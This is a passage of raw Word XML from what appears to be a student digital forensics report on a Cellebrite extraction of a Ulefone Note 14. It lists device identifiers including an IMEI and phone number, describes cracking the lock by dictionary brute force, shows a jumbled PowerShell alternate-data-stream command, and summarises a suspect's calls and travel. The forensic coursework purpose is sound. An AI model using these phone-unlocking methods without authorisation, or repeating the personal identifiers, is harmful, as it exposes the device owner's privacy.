    <w:p w14:paraId="14F44F27" w14:textId="283EC16A" w:rsidR="0020337D" w:rsidRPr="004E5562" w:rsidRDefault="00583A9A" w:rsidP="0020337D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E5562">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidR="0020337D" w:rsidRPr="004E5562">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Face Unlock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8D423D" w14:textId="0A8ED275" w:rsidR="0020337D" w:rsidRPr="004E5562" w:rsidRDefault="00583A9A" w:rsidP="0020337D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E5562">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidR="0020337D" w:rsidRPr="004E5562">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>4500mAh Battery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75330B67" w14:textId="242C88E7" w:rsidR="0020337D" w:rsidRPr="004E5562" w:rsidRDefault="00583A9A" w:rsidP="0020337D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E5562">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidR="0020337D" w:rsidRPr="004E5562">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Powered by Android™ 12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06606393" w14:textId="77777777" w:rsidR="00583A9A" w:rsidRPr="004E5562" w:rsidRDefault="00583A9A" w:rsidP="00583A9A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E5562">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Extraction Summary using Cellebrite UFED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD8A750" w14:textId="77777777" w:rsidR="00583A9A" w:rsidRPr="004E5562" w:rsidRDefault="00583A9A" w:rsidP="00583A9A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E5562">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>The following summary provides detailed information about the Ulefone Note 14 device, including its hardware, software, and network-related attributes, as extracted using digital forensic tools. Chipset: MT6761</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249788A6" w14:textId="19EB3F39" w:rsidR="00583A9A" w:rsidRPr="004E5562" w:rsidRDefault="00583A9A" w:rsidP="00583A9A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E5562">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>→Client Utilization in Extraction: Yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646200F3" w14:textId="70E51CE9" w:rsidR="00583A9A" w:rsidRPr="004E5562" w:rsidRDefault="00583A9A" w:rsidP="00583A9A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E5562">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>→Advertising ID: 0a24f44d-5908-42bd-a7cb-f7e37ea3aad5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECB5068" w14:textId="2093011F" w:rsidR="00583A9A" w:rsidRPr="004E5562" w:rsidRDefault="00583A9A" w:rsidP="00583A9A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E5562">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>→Android ID: 749c315aaaa78ca3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D86F5C" w14:textId="429EBA15" w:rsidR="00583A9A" w:rsidRPr="004E5562" w:rsidRDefault="00583A9A" w:rsidP="00583A9A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E5562">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>→Detected Manufacturer: Ulefone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22350480" w14:textId="5E559DD4" w:rsidR="00583A9A" w:rsidRPr="004E5562" w:rsidRDefault="00583A9A" w:rsidP="00583A9A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E5562">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>→Detected model: Note 14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FA6183" w14:textId="1594C4EE" w:rsidR="00583A9A" w:rsidRPr="004E5562" w:rsidRDefault="00583A9A" w:rsidP="00583A9A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E5562">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>→Phone date/time: 08/12/2023, 12:57:49</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7BD594" w14:textId="07539C0E" w:rsidR="00583A9A" w:rsidRPr="004E5562" w:rsidRDefault="00583A9A" w:rsidP="00583A9A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E5562">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>→Phone Revision: 12 SP1A.210812.016, build number 1679135682</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBD5353" w14:textId="2D968467" w:rsidR="00583A9A" w:rsidRPr="004E5562" w:rsidRDefault="00583A9A" w:rsidP="00583A9A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E5562">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>→IMEI: 355617730545771</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3278B5" w14:textId="0262298E" w:rsidR="00583A9A" w:rsidRPr="004E5562" w:rsidRDefault="00583A9A" w:rsidP="00583A9A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E5562">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>→Model: Note 14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144DA4A1" w14:textId="0AE0E0AA" w:rsidR="00583A9A" w:rsidRPr="004E5562" w:rsidRDefault="00583A9A" w:rsidP="00583A9A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E5562">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>→MSISDN: 918778244595</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B1651F" w14:textId="70179673" w:rsidR="00583A9A" w:rsidRPr="004E5562" w:rsidRDefault="00583A9A" w:rsidP="00583A9A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E5562">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>→MSISDN Type: Standard (MSISDN)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D810552" w14:textId="53F3AF8E" w:rsidR="00583A9A" w:rsidRPr="004E5562" w:rsidRDefault="00583A9A" w:rsidP="00583A9A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E5562">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>→OS: Android 12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B5D0F7" w14:textId="46A2B9F8" w:rsidR="00583A9A" w:rsidRPr="004E5562" w:rsidRDefault="00583A9A" w:rsidP="00583A9A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E5562">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>→OS_Version: 12 SecurityPatchLevel: 05/03/2023</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA3E19F" w14:textId="5F3477F6" w:rsidR="0020337D" w:rsidRPr="004E5562" w:rsidRDefault="0020337D" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AEB0409" w14:textId="2506CE26" w:rsidR="00583A9A" w:rsidRPr="004E5562" w:rsidRDefault="00583A9A" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="111F4B78" w14:textId="789EEEE4" w:rsidR="00583A9A" w:rsidRPr="004E5562" w:rsidRDefault="00583A9A" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="043F98CB" w14:textId="16D54FE2" w:rsidR="00583A9A" w:rsidRPr="004E5562" w:rsidRDefault="00583A9A" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1066440E" w14:textId="77777777" w:rsidR="00583A9A" w:rsidRDefault="00583A9A" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="608893CF" w14:textId="7A59B9A9" w:rsidR="00583A9A" w:rsidRPr="00583A9A" w:rsidRDefault="00583A9A" w:rsidP="00583A9A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00583A9A">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Storage and Backup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729B65A8" w14:textId="03F79F5E" w:rsidR="00583A9A" w:rsidRPr="00583A9A" w:rsidRDefault="00583A9A" w:rsidP="00583A9A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00583A9A">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Following is the process of using Cellebrite UFED for mobile forensics on a Ulefone Note14, including the setup of the phone. This procedure outlines the steps to prepare the Ulefone Note14 for forensic data extraction using Cellebrite UFED, including both the device and its Nano SIM card</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3618D0" w14:textId="0898DF8A" w:rsidR="00583A9A" w:rsidRPr="00583A9A" w:rsidRDefault="00583A9A" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00583A9A">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Analysis and Examination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE97F86" w14:textId="6BC46D26" w:rsidR="00583A9A" w:rsidRPr="00583A9A" w:rsidRDefault="00583A9A" w:rsidP="00583A9A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00583A9A">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Password Cracking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CDF3EB" w14:textId="77777777" w:rsidR="00583A9A" w:rsidRPr="00583A9A" w:rsidRDefault="00583A9A" w:rsidP="00583A9A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00583A9A">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>The phone under investigation was password-protected. We attempted various methods to crack the password, but encountered challenges with each approach:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05138013" w14:textId="699C3799" w:rsidR="00583A9A" w:rsidRPr="00583A9A" w:rsidRDefault="00583A9A" w:rsidP="00583A9A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00583A9A">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Contacting the Manufacturer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58251C90" w14:textId="17A174C3" w:rsidR="00583A9A" w:rsidRPr="00583A9A" w:rsidRDefault="00583A9A" w:rsidP="00583A9A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00583A9A">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>The recommended and lawful procedure is to seek assistance from the device's manufacturer or your mobile service provider. They may help you regain access through legitimate means. When we contacted the manufacturer, they required us to confirm ownership by verifying purchase details, which we didn't possess. Consequently, this method proved unsuccessful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CB5710" w14:textId="60096670" w:rsidR="00583A9A" w:rsidRPr="00583A9A" w:rsidRDefault="00583A9A" w:rsidP="00583A9A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00583A9A">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Jailbreaking the Device:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D7D0D6" w14:textId="77777777" w:rsidR="00583A9A" w:rsidRPr="00583A9A" w:rsidRDefault="00583A9A" w:rsidP="00583A9A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00583A9A">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>We refrained from attempting to jailbreak or root the device. Jailbreaking typically refers to the process of removing software restrictions imposed by the operating system on devices, commonly performed on mobile devices like iPhones running iOS. The equivalent term for Android devices is 'rooting.'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52737B48" w14:textId="63ABC654" w:rsidR="00583A9A" w:rsidRPr="00583A9A" w:rsidRDefault="00583A9A" w:rsidP="00583A9A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00583A9A">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Brute-Force Attack: Dictionary Attacks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334D5552" w14:textId="0AB9300E" w:rsidR="00583A9A" w:rsidRPr="00583A9A" w:rsidRDefault="00583A9A" w:rsidP="00583A9A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00583A9A">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>The method finally worked. We conducted tests involving a 'brute-force attack' or 'brute-forcing.' In this method, an attacker systematically tests all possible password combinations until discovering the correct one, making it a time-consuming and resource-intensive approach. The specific form of brute-force attack employed was 'dictionary attacks,' where the attacker systematically attempts various likely passwords from a precompiled list known as a 'dictionary.' This list generally includes common words, phrases, and combinations that users commonly use as passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D75513D" w14:textId="18BA8E4B" w:rsidR="00583A9A" w:rsidRPr="00583A9A" w:rsidRDefault="00583A9A" w:rsidP="00583A9A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="627A5779" w14:textId="77777777" w:rsidR="00583A9A" w:rsidRDefault="00583A9A" w:rsidP="00583A9A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Password Hint using the PhonePin.txt file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7A9860" w14:textId="70D4A8E5" w:rsidR="00583A9A" w:rsidRDefault="00583A9A" w:rsidP="00583A9A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">We downloaded the file from the University's Moodle site. Here are the commands we ran using Windows </w:t>
      </w:r>
      <w:r w:rsidRPr="00583A9A">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">CMD: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00583A9A">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Stream :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00583A9A">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00583A9A">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Zone.Identifier</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00583A9A">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> Length : 50 $path = "D:\2.2. Study Material\W O R K I N G D I R E C T O R Y\UWTSD\2.4.5. ACCA7031 - Digital Forensics Analysis\2.4.5.2. Study Material\Lectures\PhonePin.txt" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00583A9A">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>gci</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00583A9A">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Recurse | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00583A9A">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>ForEach</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00583A9A">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">-Object </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00583A9A">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">{ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00583A9A">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>gi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00583A9A">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> $_.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00583A9A">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>FullName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00583A9A">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Stream * } |</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> Where-Object Stream -ne ':$Data' Get-Content PhonePin.txt &gt; recovered_file.txt However, we could not retrieve the password through this method and next step.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F901EF" w14:textId="77777777" w:rsidR="00171782" w:rsidRDefault="00171782" w:rsidP="00583A9A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02B5783A" w14:textId="77777777" w:rsidR="00171782" w:rsidRDefault="00171782" w:rsidP="00583A9A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A3E68E1" w14:textId="77777777" w:rsidR="00171782" w:rsidRDefault="00171782" w:rsidP="00583A9A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68A04407" w14:textId="0EF00D64" w:rsidR="00583A9A" w:rsidRDefault="00583A9A" w:rsidP="00583A9A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Installed Applications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675EB175" w14:textId="3931C399" w:rsidR="00583A9A" w:rsidRPr="00583A9A" w:rsidRDefault="00583A9A" w:rsidP="00583A9A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00583A9A">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>We identified a total of 10 installed applications. None of the listed package names inherently appear suspicious as they mostly represent standard system-level applications and services within the Android operating system. The analysis of the installed applications on the suspect's mobile device does not reveal any inherently suspicious applications. The listed package names primarily consist of standard system-level applications and services typical in the Android operating system. These include apps for basic functionalities like communication services, wallpaper settings, system settings intelligence, telephony data management, note-taking, home screen launching, timekeeping, device compatibility testing, and Bluetooth MIDI support. None of these applications stand out as unusual or indicative of malicious activity on their own. Therefore, based on this app list alone, there is no immediate cause for concern regarding the suspect's use of their mobile device in relation to the alleged unauthorized activities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CB63F" w14:textId="766AAF0A" w:rsidR="00583A9A" w:rsidRDefault="00583A9A" w:rsidP="00583A9A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C38498E" w14:textId="77777777" w:rsidR="00583A9A" w:rsidRPr="00583A9A" w:rsidRDefault="00583A9A" w:rsidP="00583A9A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00583A9A">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">The investigation into the suspect's activities revealed 23 audio recordings made between July and September 2023, with a notable concentration on specific dates in August and September, suggesting significant events or discussions on those days. Analysis of call logs identified several potentially suspicious calls, with the longest conversation being with an Indian number. The suspect's contact list indicates professional ties to the UK, confirmed by a UK work contact number. An examination of 218 media files provided insights into an extensive travel pattern covering various locations within India, the UK, Dubai, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00583A9A">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Gdańsk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00583A9A">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>, Poland. Notably, the suspect's presence in Dubai appears to be limited to transit, with their journey concluding in Swansea, UK, hinting at their residence. The installed applications on their mobile device are standard system-level apps without any inherent suspicion. The comprehensive travel itinerary, call records, and contacts collectively suggest a complex pattern of movement and communication, warranting further investigation in relation to the suspected unauthorized activities in a self-driving car project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45298A1E" w14:textId="6DF1C24E" w:rsidR="00583A9A" w:rsidRDefault="00583A9A" w:rsidP="00583A9A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69A928BE" w14:textId="77777777" w:rsidR="00583A9A" w:rsidRDefault="00583A9A" w:rsidP="00583A9A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78409B7E" w14:textId="77777777" w:rsidR="00583A9A" w:rsidRDefault="00583A9A" w:rsidP="00583A9A">
